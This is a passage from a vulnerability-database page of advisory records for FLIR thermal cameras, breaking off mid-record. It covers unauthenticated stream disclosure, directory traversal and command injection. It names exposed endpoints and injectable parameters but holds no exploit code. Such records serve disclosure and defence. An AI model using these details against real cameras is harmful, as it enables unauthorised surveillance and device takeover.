Search

Find a vulnerability

Search criteria Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.

    12 vulnerabilities by FLIR

    CVE-2018-25141 (GCVE-0-2018-25141)

    Vulnerability from cvelistv5 – Published: 2025-12-24 19:27 – Updated: 2026-03-05 12:02
    VLAI
    Title
    FLIR Thermal Traffic Cameras V1.01-0bb5b27 Unauthenticated RTSP Stream Disclosure
    Summary
    FLIR thermal traffic cameras contain an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve video streams by accessing specific endpoints like /live.mjpeg, /snapshot.jpg, and RTSP streaming URLs without authentication.
    SSVC
    Exploitation: poc Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-306 - Missing Authentication for Critical Function
    Assigner
    Impacted products
    Date Public
    2018-10-06 00:00
    Credits
    LiquidWorm as Gjoko Krstic of Zero Science Lab
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2018-25141",
                    "options": [
                      {
                        "Exploitation": "poc"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-12-24T20:12:24.430897Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-12-24T20:26:01.745Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "references": [
              {
                "tags": [
                  "exploit"
                ],
                "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php"
              },
              {
                "tags": [
                  "exploit"
                ],
                "url": "https://www.exploit-db.com/exploits/45537"
              }
            ],
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "FLIR Thermal Traffic Cameras",
              "vendor": "FLIR",
              "versions": [
                {
                  "status": "affected",
                  "version": "1.01-0bb5b27"
                }
              ]
            }
          ],
          "cpeApplicability": [
            {
              "nodes": [
                {
                  "cpeMatch": [
                    {
                      "criteria": "cpe:2.3:o:flir:flir_ax8_firmware:1.01-0bb5b27:*:*:*:*:*:*:*",
                      "vulnerable": true
                    }
                  ],
                  "negate": false,
                  "operator": "OR"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "finder",
              "value": "LiquidWorm as Gjoko Krstic of Zero Science Lab"
            }
          ],
          "datePublic": "2018-10-06T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "FLIR thermal traffic cameras contain an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve video streams by accessing specific endpoints like /live.mjpeg, /snapshot.jpg, and RTSP streaming URLs without authentication."
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "LOW",
                "attackRequirements": "NONE",
                "attackVector": "NETWORK",
                "baseScore": 8.7,
                "baseSeverity": "HIGH",
                "exploitMaturity": "NOT_DEFINED",
                "privilegesRequired": "NONE",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "NONE",
                "subIntegrityImpact": "NONE",
                "userInteraction": "NONE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "NONE",
                "vulnConfidentialityImpact": "HIGH",
                "vulnIntegrityImpact": "NONE",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS"
            },
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS"
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-306",
                  "description": "Missing Authentication for Critical Function",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-05T12:02:13.472Z",
            "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
            "shortName": "VulnCheck"
          },
          "references": [
            {
              "name": "ExploitDB-45537",
              "tags": [
                "exploit"
              ],
              "url": "https://www.exploit-db.com/exploits/45537"
            },
            {
              "name": "FLIR Official Vendor Homepage",
              "tags": [
                "product"
              ],
              "url": "https://www.flir.com"
            },
            {
              "name": "Zero Science Lab Disclosure (ZSL-2018-5489)",
              "tags": [
                "third-party-advisory"
              ],
              "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php"
            }
          ],
          "title": "FLIR Thermal Traffic Cameras V1.01-0bb5b27 Unauthenticated RTSP Stream Disclosure",
          "x_generator": {
            "engine": "vulncheck"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "assignerShortName": "VulnCheck",
        "cveId": "CVE-2018-25141",
        "datePublished": "2025-12-24T19:27:47.928Z",
        "dateReserved": "2025-12-24T14:28:02.435Z",
        "dateUpdated": "2026-03-05T12:02:13.472Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2018-25141 (GCVE-0-2018-25141)

    Vulnerability from nvd – Published: 2025-12-24 19:27 – Updated: 2026-03-05 12:02
    VLAI
    Title
    FLIR Thermal Traffic Cameras V1.01-0bb5b27 Unauthenticated RTSP Stream Disclosure
    Summary
    FLIR thermal traffic cameras contain an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve video streams by accessing specific endpoints like /live.mjpeg, /snapshot.jpg, and RTSP streaming URLs without authentication.
    SSVC
    Exploitation: poc Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-306 - Missing Authentication for Critical Function
    Assigner
    Impacted products
    Date Public
    2018-10-06 00:00
    Credits
    LiquidWorm as Gjoko Krstic of Zero Science Lab
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2018-25141",
                    "options": [
                      {
                        "Exploitation": "poc"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-12-24T20:12:24.430897Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-12-24T20:26:01.745Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "references": [
              {
                "tags": [
                  "exploit"
                ],
                "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php"
              },
              {
                "tags": [
                  "exploit"
                ],
                "url": "https://www.exploit-db.com/exploits/45537"
              }
            ],
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "FLIR Thermal Traffic Cameras",
              "vendor": "FLIR",
              "versions": [
                {
                  "status": "affected",
                  "version": "1.01-0bb5b27"
                }
              ]
            }
          ],
          "cpeApplicability": [
            {
              "nodes": [
                {
                  "cpeMatch": [
                    {
                      "criteria": "cpe:2.3:o:flir:flir_ax8_firmware:1.01-0bb5b27:*:*:*:*:*:*:*",
                      "vulnerable": true
                    }
                  ],
                  "negate": false,
                  "operator": "OR"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "finder",
              "value": "LiquidWorm as Gjoko Krstic of Zero Science Lab"
            }
          ],
          "datePublic": "2018-10-06T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "FLIR thermal traffic cameras contain an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve video streams by accessing specific endpoints like /live.mjpeg, /snapshot.jpg, and RTSP streaming URLs without authentication."
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "LOW",
                "attackRequirements": "NONE",
                "attackVector": "NETWORK",
                "baseScore": 8.7,
                "baseSeverity": "HIGH",
                "exploitMaturity": "NOT_DEFINED",
                "privilegesRequired": "NONE",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "NONE",
                "subIntegrityImpact": "NONE",
                "userInteraction": "NONE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "NONE",
                "vulnConfidentialityImpact": "HIGH",
                "vulnIntegrityImpact": "NONE",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS"
            },
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS"
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-306",
                  "description": "Missing Authentication for Critical Function",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-05T12:02:13.472Z",
            "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
            "shortName": "VulnCheck"
          },
          "references": [
            {
              "name": "ExploitDB-45537",
              "tags": [
                "exploit"
              ],
              "url": "https://www.exploit-db.com/exploits/45537"
            },
            {
              "name": "FLIR Official Vendor Homepage",
              "tags": [
                "product"
              ],
              "url": "https://www.flir.com"
            },
            {
              "name": "Zero Science Lab Disclosure (ZSL-2018-5489)",
              "tags": [
                "third-party-advisory"
              ],
              "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php"
            }
          ],
          "title": "FLIR Thermal Traffic Cameras V1.01-0bb5b27 Unauthenticated RTSP Stream Disclosure",
          "x_generator": {
            "engine": "vulncheck"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "assignerShortName": "VulnCheck",
        "cveId": "CVE-2018-25141",
        "datePublished": "2025-12-24T19:27:47.928Z",
        "dateReserved": "2025-12-24T14:28:02.435Z",
        "dateUpdated": "2026-03-05T12:02:13.472Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    VAR-202401-0687

    Vulnerability from variot - Updated: 2024-01-18 22:47

    FLIR AX8 thermal sensor cameras up to and including 1.46.16 are vulnerable to Directory Traversal due to improper access restriction. This vulnerability allows an unauthenticated, remote attacker to obtain arbitrary sensitive file contents by uploading a specially crafted symbolic link file.

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202401-0687",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ax8",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "flir",
            "version": "1.46.16"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-51127"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:flir_ax8_firmware:1.46.16:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-51127"
          }
        ]
      },
      "cve": "CVE-2023-51127",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-51127",
                "trust": 1.0,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-51127"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FLIR AX8 thermal sensor cameras up to and including 1.46.16 are vulnerable to Directory Traversal due to improper access restriction. This vulnerability allows an unauthenticated, remote attacker to obtain arbitrary sensitive file contents by uploading a specially crafted symbolic link file.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-51127"
          }
        ],
        "trust": 1.0
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-51127",
            "trust": 1.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-51127",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-51127"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-51127"
          }
        ]
      },
      "id": "VAR-202401-0687",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2024-01-18T22:47:04.441000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "CVE-2023-51127",
            "trust": 0.1,
            "url": "https://github.com/risuxx/cve-2023-51127 "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-51127"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-51127"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.1,
            "url": "https://github.com/risuxx/cve-2023-51127"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-51127"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-51127"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2023-51127"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-51127"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-01-10T21:15:09.133000",
            "db": "NVD",
            "id": "CVE-2023-51127"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-01-17T22:16:06.427000",
            "db": "NVD",
            "id": "CVE-2023-51127"
          }
        ]
      }
    }

    VAR-202401-0404

    Vulnerability from variot - Updated: 2024-01-18 22:39

    Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter.

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202401-0404",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ax8",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "flir",
            "version": "1.46.16"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-51126"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.46.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-51126"
          }
        ]
      },
      "cve": "CVE-2023-51126",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-51126",
                "trust": 1.0,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-51126"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-51126"
          }
        ],
        "trust": 1.0
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-51126",
            "trust": 1.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-51126",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-51126"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-51126"
          }
        ]
      },
      "id": "VAR-202401-0404",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2024-01-18T22:39:24.166000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "CVE-2023-51126",
            "trust": 0.1,
            "url": "https://github.com/risuxx/cve-2023-51126 "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-51126"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-77",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-51126"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.1,
            "url": "https://github.com/risuxx/cve-2023-51126"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-51126"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-51126"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2023-51126"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-51126"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-01-10T21:15:09.083000",
            "db": "NVD",
            "id": "CVE-2023-51126"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-01-17T21:10:20.837000",
            "db": "NVD",
            "id": "CVE-2023-51126"
          }
        ]
      }
    }

    VAR-202212-0903

    Vulnerability from variot - Updated: 2023-12-18 13:22

    A vulnerability classified as critical has been found in Teledyne FLIR AX8 up to 1.46.16. Affected is an unknown function of the file palette.php of the component Web Service Handler. The manipulation of the argument palette leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-215118 is the identifier assigned to this vulnerability. FLIR Systems, Inc. of flir ax8 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
